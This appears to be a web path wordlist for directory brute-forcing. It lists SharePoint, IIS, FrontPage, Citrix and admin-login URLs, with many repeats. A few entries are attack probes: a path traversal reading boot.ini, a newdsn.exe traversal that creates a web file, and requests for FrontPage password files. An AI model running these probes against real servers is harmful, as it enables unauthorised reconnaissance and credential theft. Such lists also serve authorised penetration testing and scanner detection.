/_layouts/15/fldnew.aspx
/_layouts/15/grpman.aspx
/_layouts/15/grpsel.aspx
/_layouts/15/iframe.aspx
/_layouts/15/lstman.aspx
/_layouts/15/mygrps.aspx
/_layouts/15/mysubs.aspx
/_layouts/15/newdwp.aspx
/_layouts/15/newgrp.aspx
/_layouts/15/newmws.aspx
/_layouts/15/portal.aspx
/_layouts/15/qstnew.aspx
/_layouts/15/report.aspx
/_layouts/15/reqacc.aspx
/_layouts/15/shropt.aspx
/_layouts/15/spanon.aspx
/_layouts/15/subnew.aspx
/_layouts/15/wpeula.aspx
/_layouts/15/cspp1.aspx
/_layouts/15/cspp2.aspx
/_layouts/15/error.aspx
/_layouts/15/proxy.aspx
/_layouts/15/srman.aspx
/_layouts/15/usage.aspx
/_layouts/15/cspp1.aspx
/_layouts/15/cspp2.aspx
/_layouts/15/error.aspx
/_layouts/15/proxy.aspx
/_layouts/15/srman.aspx
/_layouts/15/usage.aspx
/_layouts/15/bpcf.aspx
/_layouts/15/help.aspx
/_layouts/15/role.aspx
/_layouts/15/spcf.aspx
/_layouts/15/user.aspx
/_layouts/15/bpcf.aspx
/_layouts/15/help.aspx
/_layouts/15/role.aspx
/_layouts/15/spcf.aspx
/_layouts/15/user.aspx
/_layouts/15/dws.aspx
/_layouts/15/new.aspx
/_layouts/15/dws.aspx
/_layouts/15/new.aspx
/_catalogs/wt/forms/common.aspx
/useredit.aspx?id=1&source=%2f%5flayouts%2fpeople%2easpx
/_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%252goatfart.html&newdb=CREA
/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
/Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
/search?NS-query-pat=..%5C..%5C..%5C..%5C..%5Cboot.ini
/SiteServer/Admin/commerce/foundation/driver.asp
/Sites/Knowledge/Membership/Inspired/ViewCode.asp
/SiteServer/Admin/commerce/foundation/DSN.asp
/citrix/AccessPlatform/auth/clientscripts/
/SiteServer/Admin/knowledge/dsmgr/default.asp
/_vti_bin/microsoft.sharepoint.portal.singlesignon.security.dll
/Sites/Samples/Knowledge/Search/ViewCode.asp
/Admin/knowledge/dsmgr/users/GroupManager.asp
/redirectpage.aspx?target=%7Bsitecollectionurl%7D_catalogs/masterpage
/Admin/knowledge/dsmgr/users/UserManager.asp
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/Sites/Samples/Knowledge/Push/ViewCode.asp
/_vti_bin/microsoft.sharepoint.portal.admin.search.dll
/_vti_bin/microsoft.sharepoint.portal.admin.search.xml
/_catalogs/masterpage/forms/allitems.aspx
/iissamples/exair/howitworks/Codebrw1.asp
/iissamples/exair/howitworks/Codebrws.asp
/_vti_bin/microsoft.sharepoint.portal.singlesignon.dll
/_vti_bin/microsoft.sharepoint.portal.singlesignon.xml
/AccessPlatform/auth/clientscripts/
/_vti_bin/fpcount.exe?Page=default.asp%7CImage=3
/iissamples/exair/howitworks/Code.asp
/_vti_bin/_vti_aut/fp30reg.dll?1234=X
/docs/lists/announcements/dispform.aspx
/docs/lists/announcements/allitems.aspx
/iissamples/sdk/asp/docs/codebrw2.asp
/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/sdk/asp/docs/CodeBrws.asp
/shared%20documents/forms/allitems.aspx
/msadc/Samples/selector/showcode.asp
/scripts/samples/search/webhits.exe
/docs/documents/forms/allitems.aspx
/microsoft.sharepoint.portal.singlesignon.security.dll
/AdvWorks/equipment/catalog_type.asp
/Microsoft-Server-ActiveSync/
/siteserver/publishing/viewcode.asp
/SiteServer/Publishing/viewcode.asp
/_vti_bin/_vti_adm/fpadmdll.dll
/_vti_bin/_vti_aut/fp30reg.dll
/_catalogs/wp/forms/allitems.aspx
/_catalogs/lt/forms/allitems.aspx
/_vti_bin/microsoft.sharepoint.portal.dll
/_vti_bin/microsoft.sharepoint.portal.xml
/CFIDE/Administrator/startstop.html
/citrix/AccessPlatform/auth/
/scripts/iisadmin/ism.dll?http/dir
/_vti_bin/_vti_aut/dvwssr.dll
/sitedirectory/pages/category.aspx
/_vti_bin/shtml.exe/qwertyuiop
/sitedirectory/pages/sitemap.aspx
/panel-administracion/login.aspx
/panel-administracion/login.asp
/_vti_bin/contentareatoolboxservice.asmx
/searchcenter/pages/default.aspx
/SiteServer/admin/findvserver.asp
/_vti_bin/userprofilechangeservice.asmx
/docs/lists/tasks/allitems.aspx
/_vti_bin/userprofileservicedisco.aspx
/microsoft.sharepoint.portal.admin.search.dll
/microsoft.sharepoint.portal.admin.search.xml
/iishelp/iis/misc/default.asp
/_vti_bin/userprofileservicewsdl.aspx
/_vti_bin/microsoft.sharepoint.dll
/_vti_bin/microsoft.sharepoint.xml
/_vti_bin/publishedlinksservice.asmx
/microsoft.sharepoint.portal.singlesignon.dll
/microsoft.sharepoint.portal.singlesignon.xml
/Database_Administration/
/Database_Administration/
//_vti_bin/shtml.exe?_vti_rp
/cgi-bin/a1stats/a1disp.cgi
/_vti_bin/businessdatacatalog.asmx
/_vti_bin/outlookadapterdisco.aspx
/Mail/smtp/Admin/smadv.asp
/_vti_bin/outlookadapterwsdl.aspx
/_vti_bin/userprofileservice.asmx
/bdcadminui/viewbdcapplication.aspx
/_vti_bin/bdcfieldsresolver.asmx
/_vti_bin/formsserviceproxy.asmx
/_vti_bin/publishingservice.asmx
/_vti_bin/sharepointemailws.asmx
/_vti_bin/webpartpagesdisco.aspx
/bdcadminui/addbdcapplication.aspx
/bdcadminui/managepermissions.aspx
/system-administration/
/system_administration/
/system-administration/
/system_administration/
/pages/admin/admin-login.aspx
/_vti_bin/areaservicedisco.aspx
/_vti_bin/permissionsdisco.aspx
/_vti_bin/webpartpageswsdl.aspx
/pages/admin/admin-login.asp
/Citrix/PNAgent/config.xml
/_vti_bin/areaservicewsdl.aspx
/_vti_bin/permissionswsdl.aspx
/reports/pages/default.aspx
/variations/variationimport.aspx
/administratoraccounts/
/panel-administracion/
/administratoraccounts/
/panel-administracion/
/scripts/tools/getdrvs.exe
/_vti_bin/authentication.asmx
/_vti_bin/outlookadapter.asmx
/_vti_bin/usergroupdisco.aspx
/signaturedetailspngloader.formserver.aspx
/AccessPlatform/auth/
/scripts/tools/newdsn.exe
/_vti_pvt/administrators.pwd
/_vti_bin/formsservices.asmx
/_vti_bin/meetingsdisco.aspx
/_vti_bin/sitedatadisco.aspx
/_vti_bin/spscrawldisco.aspx
/_vti_bin/usergroupwsdl.aspx
/_vti_bin/versionsdisco.aspx
/bdcadminui/viewbdcentity.aspx
/news/pages/newsarchive.aspx
/Lotus_Domino_Admin/
/server_admin_small/
/administrator/account.aspx
/Lotus_Domino_Admin/
/server_admin_small/
/_vti_pvt/administrator.pwd
/_vti_bin/excelservice.asmx
/_vti_bin/imagingdisco.aspx
/_vti_bin/meetingswsdl.aspx
/_vti_bin/officialfile.asmx
/_vti_bin/sitedatawsdl.aspx
/_vti_bin/slidelibrary.asmx
/_vti_bin/spscrawlwsdl.aspx
/_vti_bin/versionswsdl.aspx
/_vti_bin/webpartpages.asmx
/bdcadminui/addbdcaction.aspx
/forms/forms/allitems.aspx
/pages/forms/allitems.aspx
/pages/forms/dispform.aspx
/pages/forms/editform.aspx
/administrator/account.asp
/cgi-bin/imagemap.exe?2,2
/_vti_bin/alertsdisco.aspx
/_vti_bin/areaservice.asmx
/_vti_bin/dspstsdisco.aspx
/_vti_bin/permissions.asmx
/_vti_bin/searchdisco.aspx
/_vti_bin/imagingwsdl.aspx
/pages/forms/combine.aspx
/signaturedetailsloader.formserver.aspx
/ServerAdministrator/
/administrator/login.aspx
/ServerAdministrator/
/cgi-bin/htimage.exe?2,2
/_vti_bin/alertswsdl.aspx
/_vti_bin/dspstswsdl.aspx
/_vti_bin/formsdisco.aspx
/_vti_bin/listsdisco.aspx
/_vti_bin/searchwsdl.aspx
/_vti_bin/sitesdisco.aspx
/_vti_bin/spellcheck.asmx
/_vti_bin/viewsdisco.aspx
/administrator/login.asp
/_mem_bin/autoconfig.asp
/_mem_bin/formslogin.asp
/_vti_bin/formswsdl.aspx
/_vti_bin/listswsdl.aspx
/_vti_bin/portalapi.aspx
/_vti_bin/siteswsdl.aspx
/_vti_bin/usergroup.asmx
/_vti_bin/viewswsdl.aspx
/_vti_bin/websdisco.aspx
/changecontenttypeoptionalsettings.aspx
/news/pages/default.aspx
/ss_vms_admin_sm/
/administratorlogin/
/ss_vms_admin_sm/
/administratorlogin/
/_vti_bin/dwsdisco.aspx
/_vti_bin/exportwp.aspx
/_vti_bin/expurlwp.aspx
/_vti_bin/meetings.asmx
/_vti_bin/sitedata.asmx
/_vti_bin/spscrawl.asmx
/_vti_bin/spsearch.asmx
/_vti_bin/versions.asmx
/_vti_bin/webswsdl.aspx
/_vti_bin/workflow.asmx
/_vti_bin/dwswsdl.aspx
/_vti_bin/imaging.asmx
/_vti_bin/spdisco.aspx
/_vti_bin/wsdisco.aspx
/excelserveruserdefinedfunctions.aspx
/forms/dispform.aspx?id=1
/forms/editform.aspx?id=1
/admin_area/admin.aspx
/admin_area/login.aspx
/modelsearch/login.aspx
/_vti_pvt/service.pwd
/_vti_pvt/authors.pwd
/_vti_bin/alerts.asmx
/_vti_bin/dspsts.asmx
/_vti_bin/global.asax
/_vti_bin/people.asmx
/_vti_bin/search.asmx
/_vti_bin/wswsdl.aspx
/excelserveruserdefinedfunction.aspx
/microsoft.sharepoint.portal.dll
/microsoft.sharepoint.portal.xml
/people.aspx?membershipgroupid=0
/admin_area/admin.asp
/admin_area/login.asp
/modelsearch/login.asp
/_vti_bin/admin.asmx
/_vti_bin/forms.asmx
/_vti_bin/lists.asmx
/_vti_bin/owssvr.dll
/_vti_bin/sites.asmx
/_vti_bin/ssocli.dll
/_vti_bin/views.asmx
/_vti_bin/web.config
/managefeatures.aspx?scope=site
/signaturedetails.formserver.aspx
/sps/portalcreatesuccess.aspx
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/_admin/operations.aspx
/_vti_bin/copy.asmx
/_vti_bin/webs.asmx
/contenttypeconvertersettings.aspx
/excelserversafedataproviders.aspx
/longrunningoperationprogress.aspx
/pbserver/pbserver.dll
/_vti_bin/dws.asmx
/excelserversafedataprovider.aspx
/excelservertrustedlocations.aspx
/mobile/viewcomment.aspx
/bb-admin/admin.html
/LiveUser_Admin/
/login-redirect/
/customer_login/
/project-admins/
/admin4_account/
/admin/admin_login.aspx
/admin/admin-login.aspx
/bb-admin/login.aspx
/bb-admin/admin.aspx
/bb-admin/admin.html
/LiveUser_Admin/
/login-redirect/
/customer_login/
/project-admins/
/admin4_account/
/moderator/login.aspx
/moderator/admin.aspx
/supervise/Login.aspx
/domcfg.nsf/?open
/excelservertrustedlocation.aspx
/signatureeula.formserver.aspx
/sps/farmtopologyview.aspx
/admin/controlpanel.html
/admin/admin_login.asp
/admin/admin-login.asp
/bb-admin/login.asp
/bb-admin/admin.asp
/moderator/login.asp
/moderator/admin.asp
/supervise/Login.asp
/admin/controlpanel.html
/admin/controlpanel.aspx
/AccessPlatform/
/administration/
/includes/adovbs.inc
/mngsubwebs.aspx?view=sites
/admin/controlpanel.htm
/admin/controlpanel.asp
/administration/
/administrators/
/support_login/
/utility_login/
/phpSQLiteAdmin/
/logo_sysadmin/
/modules/admin/
/admin/controlpanel.htm
/administration/
/administrators/
/support_login/
/utility_login/
/phpSQLiteAdmin/
/logo_sysadmin/
/modules/admin/
/cgi-bin/login.aspx
/scripts/cgimail.exe
/scripts/counter.exe
/scripts/fpcount.exe
/businessdatasynchronizer.aspx
/filtervaluespickerdialog.aspx
/manageservicepermissions.aspx
/newtranslationmanagement.aspx
/printloader.formserver.aspx
/spusagesiteclickthroughs.aspx
/spusagesitesearchresults.aspx
/spusagesitesearchqueries.aspx
/webpartgallerypickerpage.aspx
/admin/adminLogin.html
/cgi-bin/login.asp
/admin/adminLogin.html
/admin/adminLogin.aspx
/administrator/
/aspnet_files/
/cgi-bin/htmlscript
/exchange/root.asp
/addnavigationlinkdialog.aspx
/mobile/newform.aspx
/mobile/newpost.aspx
/sitemanager.aspx?lro=all
/spusagesspsearchqueries.aspx
/spusagesspsearchresults.aspx
/spusagewebclickthroughs.aspx
/userprofileservicedisco.aspx
/admin/adminLogin.htm
/administrator/
/administratie/
/administrivia/
/wizmysqladmin/
/ezsqliteadmin/
/hpwebjetadmin/
/irc-macadmin/
/admin4_colon/
/globes_admin/
/admin/adminLogin.asp
/admin/adminLogin.htm
/administrator/
/administratie/
/administrivia/
/wizmysqladmin/
/ezsqliteadmin/
/hpwebjetadmin/
/irc-macadmin/
/admin4_colon/
/globes_admin/
/admincp/login.aspx
/SiteServer/Admin
/WEB-INF/web.xml
/areanavigationsettings.aspx
/audience_defruleedit.aspx
/changecontenttypeorder.aspx
/excelservertrusteddcls.aspx
/forms/dispform.aspx
/forms/editform.aspx
/listservernamemappings.aspx
/managecontenttypefield.aspx
/mysite/person.aspx
/signature.formserver.aspx
/userprofileservicewsdl.aspx
/admincp/login.asp
/addservernamemappings.aspx
/applyregionalsettings.aspx
/audience_memberlist.aspx
/editrelevancesettings.aspx
/excelservertrusteddcl.aspx
/forms/myitems.aspx
/forms/newform.aspx
/formserverattachments.aspx
/getdataconnectionfile.aspx
/managecheckedoutfiles.aspx
/microsoft.sharepoint.dll
/microsoft.sharepoint.xml
/pages/default.aspx
/postback.formserver.aspx
/rellinksscopesettings.aspx
/selectcrawledproperty.aspx
/selectmanagedproperty.aspx
/sitedirectorysettings.aspx
/admin/account.html
/controlpanel/
/cpanel_file/
/platz_login/
/openvpnadmin/
/phpldapadmin/
/Super-Admin/
/navSiteAdmin/
/pages/admin/
/admincontrol/
/login_admin/
/admin/account.html
/admin/account.aspx
/controlpanel/
/cpanel_file/
/platz_login/
/openvpnadmin/
/phpldapadmin/
/Super-Admin/
/navSiteAdmin/
/pages/admin/
/admincontrol/
/login_admin/
/forum_professionnel.asp
/addcontenttypetolist.aspx
/addfieldfromtemplate.aspx
/areatemplatesettings.aspx
/barcodeimagefromitem.aspx
/changesitemasterpage.aspx
/contentaccessaccount.aspx
/dynamicimageprovider.aspx
/manageitemscheduling.aspx
/mobile/view.aspx
/quicklinksdialogform.aspx
/sps/portallist.aspx
/spusagesitereferrers.aspx
/translatablesettings.aspx
/viewgrouppermissions.aspx
/admin/account.asp
/certcontrol/
/audience_chooser2.aspx
/categorypickerpopup.aspx
/centraldatabaselock.aspx
/cmsslwpaddeditgroup.aspx
/confirmadvancedmode.aspx
/docs/default.aspx
/editcopyinformation.aspx
/excelserversettings.aspx
/listenabletargeting.aspx
/listgeneralsettings.aspx
/listsearchschedules.aspx
/manageprivacypolicy.aspx
/objectcachesettings.aspx
/officialfilesuccess.aspx
/outlookadapterdisco.aspx
/portalcreatesuccess.aspx
/searchresultremoval.aspx
/siteoperationrefuse.aspx
/spusagesitehomepage.aspx
/spusagesitetoppages.aspx
/spusagewebreferrers.aspx
/unapprovedresources.aspx
/admin/login.html
/admin_area/
/directadmin/
/meta_login/
/manuallogin/
/simpleLogin/
/acct_login/
/Indy_admin/
/banneradmin/
/power_user/
/memberadmin/
/admin/login.html
/admin/admin.aspx
/admin_area/
/directadmin/
/meta_login/
/manuallogin/
/simpleLogin/
/acct_login/
/Indy_admin/
/banneradmin/
/power_user/
/memberadmin/
/admin/login.aspx
/assetedithyperlink.aspx
/assetportalbrowser.aspx
/audience_chooser.aspx
/bulkwrktaskhandler.aspx
/cmsslwpaddeditlink.aspx
/editdisplaymapping.aspx
/editpropertynames2.aspx
/editsearchschedule.aspx
/editsearchsettings.aspx
/formserverdetector.aspx
/listcontentsources.aspx
/outlookadapterwsdl.aspx
/print.formserver.aspx
/propertyproperties.aspx
/reusabletextpicker.aspx
/searchandaddtohold.aspx
/sendtoofficialfile.aspx
/spusagewebhomepage.aspx
/spusagewebtoppages.aspx
/admin/login.htm
/admin/admin.asp
/admin/login.asp
/admin/login.htm
/admin/home.aspx
/administratorlogin.aspx
/certenroll/
/iissamples/
/_mem_bin/
/_vti_adm/
/_vti_aut/
/_vti_cnf/
/_vti_log/
/_WEB_INF/
/areacachesettings.aspx
/convertersettings.aspx
/deactivatefeature.aspx
/editcontentsource.aspx
/editpropertynames.aspx
/lroperationstatus.aspx
/managecontenttype.aspx
/newdisplaymapping.aspx
/officialfilesetup.aspx
/quicklinksdialog2.aspx
/scopedisplaygroup.aspx
/searchsspsettings.aspx
/sitecachesettings.aspx
/smtcommentsdialog.aspx
/sps/default.aspx
/userdisp.aspx?id=1
/variationsettings.aspx
/viewscopesettings.aspx
/webpartpagesdisco.aspx
/admin/home.asp
/adminitems/
/adminLogin/
/supervisor/
/management/
/phpmyadmin/
/administr8/
/administer/
/sys-admin/
/formslogin/
/sub-login/
/dir-login/
/phppgadmin/
/sql-admin/
/vmailadmin/
/ccp14admin/
/radmind-1/
/AdminTools/
/administratorlogin.asp
/adminpanel/
/login_out/
/loginerror/
/loginsuper/
/adminitems/
/adminLogin/
/supervisor/
/management/
/phpmyadmin/
/administr8/
/administer/
/sys-admin/
/formslogin/
/sub-login/
/dir-login/
/phppgadmin/
/sql-admin/
/vmailadmin/
/ccp14admin/
/radmind-1/
/AdminTools/
/adminpanel/
/login_out/
/loginerror/
/loginsuper/
/accessdeniedpage.aspx
/addcontentsource.aspx
/areaservicedisco.aspx
/assetimagepicker.aspx
/associatedgroups.aspx
/audience_sched.aspx
/changefieldorder.aspx
/cmsslwpsortlinks.aspx
/excelprofilepage.aspx
/farmtopologyview.aspx
/listsearchscopes.aspx
/managecrawlrules.aspx
/newvariationsite.aspx
/osssearchresults.aspx
/permissionsdisco.aspx
/portalproperties.aspx
/quicklinksdialog.aspx
/resolverecipient.aspx
/spusagesiteusers.aspx
/webpartpageswsdl.aspx
/admin/cp.aspx
/admin/db.php
/adsamples/
/iiasdmpwd/
/_fpclass/
/_vti_bin/shtml.dll/asdfghjkl
/adminrecyclebin.aspx
/areaservicewsdl.aspx
/areawelcomepage.aspx
/associateportal.aspx
/audience_edit.aspx
/audience_list.aspx
/audience_main.aspx
/audience_view.aspx
/cmsslwpeditview.aspx
/containerpicker.aspx
/createadaccount.aspx
/crawledproperty.aspx
/customizereport.aspx
/displaymappings.aspx
/dmworkspacemgmt.aspx
/ewrcustomfilter.aspx
/excelcellpicker.aspx
/linkscheckerwiz.aspx
/listsyndication.aspx
/managedproperty.aspx
/managefiletypes.aspx
/newalertfromsts.aspx
/nocrawlsettings.aspx
/pageversioninfo.aspx
/permissionswsdl.aspx
/pickercontainer.aspx
/profileredirect.aspx
/reqgroupconfirm.aspx
/rte2erowcolsize.aspx
/spusagewebusers.aspx
/useconfirmation.aspx
/variationexport.aspx
/variationlabels.aspx
/wsrpmarkupproxy.aspx
/admin/cp.asp
/adminitem/
/superuser/
/moderator/
/fileadmin/
/ur-admin/
/wp-admin/
/useradmin/
/sysadmins/
/staradmin/
/blogindex/
/autologin/
/loginflat/
/showlogin/
/wp-login/
/login_db/
/UserLogin/
/login-us/
/pureadmin/
/newsadmin/
/SysAdmin2/
/bb-admin/
/instadmin/
/adminarea/
/siteadmin/
/adminsite/
/webmaster/
/loginsave/
/supervise/
/adminitem/
/superuser/
/moderator/
/fileadmin/
/ur-admin/
/wp-admin/
/useradmin/
/sysadmins/
/staradmin/
/blogindex/
/autologin/
/loginflat/
/showlogin/
/wp-login/
/login_db/
/UserLogin/
/login-us/
/pureadmin/
/newsadmin/
/SysAdmin2/
/bb-admin/
/instadmin/
/adminarea/
/siteadmin/
/adminsite/
/webmaster/
/loginsave/
/supervise/
//administrators.pwd
/alertdirectory.aspx
/createworkbook.aspx
/enhancedsearch.aspx
/managefeatures.aspx
/mycontactlinks.aspx
/pickertreeview.aspx
/portalsettings.aspx
/searchsettings.aspx
/selectpicture2.aspx
/speditcategory.aspx
/spnewdashboard.aspx
/updateschedule.aspx
/usergroupdisco.aspx
/variationlabel.aspx
/administration.aspx
/authentication.aspx
/administrators.aspx
/cmsample/
/Exchange/
/iisadmin/
/assetuploader.aspx
/auditsettings.aspx
/bulkwrktaskip.aspx
/createwebpage.aspx
/dmplaceholder.aspx
/editcrawlrule.aspx
/emailsettings.aspx
/excelrenderer.aspx
/genericpicker.aspx
/getssploginfo.aspx
/htmltranslate.aspx
/meetingsdisco.aspx
/mymemberships.aspx
/newpagelayout.aspx
/personalsites.aspx
/profadminedit.aspx
/regionalsetng.aspx
/searchresults.aspx
/selectpicture.aspx
/sitedatadisco.aspx
/spcateditperm.aspx
/speditlisting.aspx
/spnewcategory.aspx
/spmovelisting.aspx
/spscrawldisco.aspx
/spusageconfig.aspx
/usergroupwsdl.aspx
/variationlogs.aspx
/versionsdisco.aspx
/administration.asp
/superman/
/sign_in/
/sign-in/
/accounts/
/authentication.asp
/webadmin/
/SysAdmin/
/memlogin/
/smblogin/
/bigadmin/
/adminpro/
/sshadmin/
/macadmin/
/cmsadmin/
/administrators.asp
/security/
/0manager/
/admin-login.aspx
/administrator.aspx
/superman/
/sign_in/
/sign-in/
/accounts/
/webadmin/
/SysAdmin/
/memlogin/
/smblogin/
/bigadmin/
/adminpro/
/sshadmin/
/macadmin/
/cmsadmin/
/admin_login.aspx
/security/
/0manager/
/login_admin.aspx
/super_index.aspx
/super_login.aspx
/ajfhasdfgsagfakjhgd
/accessdenied.aspx
/confirmalert.aspx
/confirmation.aspx
/createmysite.aspx
/ctdmsettings.aspx
/editdsserver.aspx
/editproperty.aspx
/editschedule.aspx
/emaildetails.aspx
/enablealerts.aspx
/ewrpredialog.aspx
/exemptpolicy.aspx
/exportpolicy.aspx
/formresource.aspx
/getsspscopes.aspx
/getsspstatus.aspx
/hierarchyman.ascx
/htmltrverify.aspx
/imagingdisco.aspx
/importpolicy.aspx
/itemrwfassoc.aspx
/keywordbbman.aspx
/linkschecker.aspx
/listkeywords.aspx
/managecopies.aspx
/matchingrule.aspx
/meetingswsdl.aspx
/mngsiteadmin.aspx
/myquicklinks.aspx
/mysiteheader.aspx
/noteswizard1.aspx
/noteswizard2.aspx
/noteswizard3.aspx
/noteswizard4.aspx
/pagesettings.aspx
/pickerresult.aspx
/policyconfig.aspx
/portalheader.aspx
/progresspage.aspx
/redirectpage.aspx
/rte2pueditor.aspx
/sitedatawsdl.aspx
/spcataddperm.aspx
/spellchecker.aspx
/spnewlisting.aspx
/spscrawlwsdl.aspx
/submitrepair.aspx
/templatepick.aspx
/updatecopies.aspx
/urltranslate.aspx
/usagedetails.aspx
/versionswsdl.aspx
/xlatewfassoc.aspx
/admin-login.asp
/administrator.asp
/admin_login.asp
/login_admin.asp
/super_index.asp
/super_login.asp
/processlogin.aspx
/controlpanel.aspx
/admincontrol.aspx
/admin_area.aspx
/login_user.aspx
/supermanager.aspx
/certsrv/
/checkapache.html
/Exadmin/
/ExchWeb/
/iishelp/
/samples/
/scripts/
/addfiletype.aspx
/alertsadmin.aspx
/alertserror.aspx
/alertsdisco.aspx
/copyresults.aspx
/dspstsdisco.aspx
/editprofile.aspx
/editsection.aspx
/helpcontent.aspx
/htmltrredir.aspx
/imagingwsdl.aspx
/listindexes.aspx
/mapproperty.aspx
/mgrdsserver.aspx
/mgrproperty.aspx
/newfiletype.aspx
/newsiterule.aspx
/publishback.aspx
/releasehold.aspx
/reqfeatures.aspx
/searchdisco.aspx
/searchreset.aspx
/searchscope.aspx
/sitemanager.aspx
/speditgroup.aspx
/spsredirect.aspx
/spsviewtype.aspx
/spsviewlsts.aspx
/spusagesite.aspx
/versiondiff.aspx
/viewseclsts.aspx
/manager/
/letmein/
/control/
/members/
/uvpanel/
/log-in/
/log_in/
/processlogin.asp
/authenticate.asp
/controlpanel.asp
/admincontrol.asp
/myadmin/
/pgadmin/
/rcLogin/
/radmind/
/vadmind/
/bbadmin/
/cadmins/
/admincp/
/admin_area.asp
/login_user.asp
/loginok/
/secrets/
/supermanager.asp
/manager/
/letmein/
/control/
/members/
/uvpanel/
/log-in/
/log_in/
/myadmin/
/pgadmin/
/rcLogin/
/radmind/
/vadmind/
/bbadmin/
/cadmins/
/admincp/
/memberadmin.aspx
/login_out.aspx
/loginok/
/secrets/
//vti_inf.html
/forum_arc.asp
/test/
/alertswsdl.aspx
/assocwrkfl.aspx
/createpage.aspx
/cstwrkflip.aspx
/dspstswsdl.aspx
/editpolicy.aspx
/formsdisco.aspx
/formserver.aspx
/helpsearch.aspx
/holdreport.aspx
/importdata.aspx
/iniwrkflip.aspx
/labelimage.aspx
/listsdisco.aspx
/logsummary.aspx
/metaweblog.aspx
/mngsubwebs.aspx
/modwrkflip.aspx
/navoptions.aspx
/newcatalog.aspx
/policylist.aspx
/portallist.aspx
/portalview.aspx
/properties.aspx
/quicklinks.aspx
/recyclebin.aspx
/reporthome.aspx
/rte2etable.aspx
/selectuser.aspx
/sitesdisco.aspx
/searchwsdl.aspx
/spnewgroup.aspx
/spusageweb.aspx
/userpicker.aspx
/viewscopes.aspx
/viewsdisco.aspx
/vssettings.aspx
/webdeleted.aspx
/memberadmin.asp
/login_out.asp
/adminitems.aspx
/adminlogin.aspx
/management.aspx
/wp-login.aspx
/checklogin.aspx
/checkadmin.aspx
/adminpanel.aspx
/ur-admin.aspx
/administr8.aspx
/adm_auth.aspx
/loginsuper.aspx
/_AuthChangeUrl
/citrix/
/Public/
/backlinks.aspx
/deleteweb.aspx
/editalert.aspx
/ewrfilter.aspx
/filetypes.aspx
/fldeditex.aspx
/formswsdl.aspx
/images/
/iviewhost.aspx
/listswsdl.aspx
/logviewer.aspx
/notesedit.aspx
/permsetup.aspx
/policycts.aspx
/portalapi.aspx
/renderudc.aspx
/reporting.aspx
/rte2ecell.aspx
/rtedialog.aspx
/runreport.aspx
/setimport.aspx
/siteswsdl.aspx
/spaddrole.aspx
/spsaclinv.aspx
/spscreate.aspx
/stswebtemp.gif
/viewswsdl.aspx
/websdisco.aspx
/wrktaskip.aspx
/adminitems.asp
/adminlogin.asp
/access/
/sysadm/
/member/
/manage/
/management.asp
/signin/
/wp-login.php
/checklogin.asp
/checkadmin.asp
/adminpanel.asp
/ur-admin.asp
/Server/
/administr8.asp
/admins/
/admin1/
/cpanel/
/login1/
/xlogin/
/adm_auth.asp
/kpanel/
/PSUser/
/secure/
/secret/
/moderator.html
/aadmin/
/0admin/
/loginsuper.asp
/super1/
/adminitem.aspx
/access/
/superuser.aspx
/sysadm/
/member/
/manage/
/signin/
/sign_in.aspx
/sign-in.aspx
/checkuser.aspx
/authadmin.aspx
/moderator.aspx
/fileadmin.aspx
/Server/
/admins/
/admin1/
/cpanel/
/login1/
/xlogin/
/affiliate.aspx
/kpanel/
/siteadmin.aspx
/PSUser/
/secure/
/webmaster.aspx
/autologin.aspx
/userlogin.aspx
/secret/
/moderator.html
/moderator.aspx
/0admin/
/aadmin/
/super1/
/superuser.aspx
//queryhit.htm
//QUERYHIT.HTM
/postinfo.html
/addwrkfl.aspx
/advsetng.aspx
/aspxform.aspx
/avreport.aspx
/category.aspx
/choosecs.aspx
/copyrole.aspx
/copyutil.aspx
/createws.aspx
/ctypenew.aspx
/ctypedit.aspx
/deletemu.aspx
/dladvopt.aspx
/doctrans.aspx
/download.aspx
/dwsdisco.aspx
/editprms.aspx
/editrole.aspx
/editview.aspx
/ewrtop10.aspx
/expurlwp.aspx
/exportwp.aspx
/fldnewex.aspx
/htmledit.aspx
/infopage.aspx
/listedit.aspx
/listfeed.aspx
/lstsetng.aspx
/mcontent.aspx
/mngctype.aspx
/mngfield.aspx
/mtgredir.aspx
/myalerts.aspx
/newalert.aspx
/newsbweb.aspx
/password.aspx
/prjsetng.aspx
/profmain.aspx
/profmngr.aspx
/quiklnch.aspx
/redirect.aspx
/remwrkfl.aspx
/reqgroup.aspx
/rfcxform.aspx
/rfpxform.aspx
/savetmpl.aspx
/scsignup.aspx
/setrqacc.aspx
/settings.aspx
/sitelist.aspx
/sitesubs.aspx
/siteusrs.aspx
/spcatsec.aspx
/spcontnt.aspx
/ssologon.aspx
/subchoos.aspx
/survedit.aspx
/themeweb.aspx
/toolpane.aspx
/userdisp.aspx
/useredit.aspx
/userinfo.aspx
/versions.aspx
/viewedit.aspx
/viewlsts.aspx
/viewtype.aspx
/vsubwebs.aspx
/webadmin.aspx
/webswsdl.aspx
/webusers.aspx
/workflow.aspx
/workspce.aspx
/wrksetng.aspx
/xlviewer.aspx
/zoombldr.aspx
/adminitem.asp
/superuser.asp
/sign_in.asp
/sign-in.asp
/checkuser.asp
/authadmin.asp
/moderator.asp
/fileadmin.asp
/yonetici.html
/affiliate.asp
/siteadmin.asp
/webmaster.asp
/autologin.asp
/userlogin.asp
/moderator.php
/superuser.asp
/log-in.aspx
/log_in.aspx
/accounts.aspx
/authuser.aspx
/sysadmin.aspx
/yonetici.aspx
/yonetici.html
/webadmin.aspx
/cmsadmin.aspx
/yonetici.aspx
/superman.aspx
//authors.pwd
//default.htm
//frontpg.ini
//search
//Search
//service.pwd
/admin/
/imprimer.asp
/isapi/
/msadc/
/rubrique.asp
/share/
/tsweb/
/addgrp2.aspx
/addgrp1.aspx
/addrole.aspx
/allgrps.aspx
/approve.aspx
/autocat.aspx
/avreport.htm
/bestbet.aspx
/checkin.aspx
/conngps.aspx
/default.aspx
/discbar.aspx
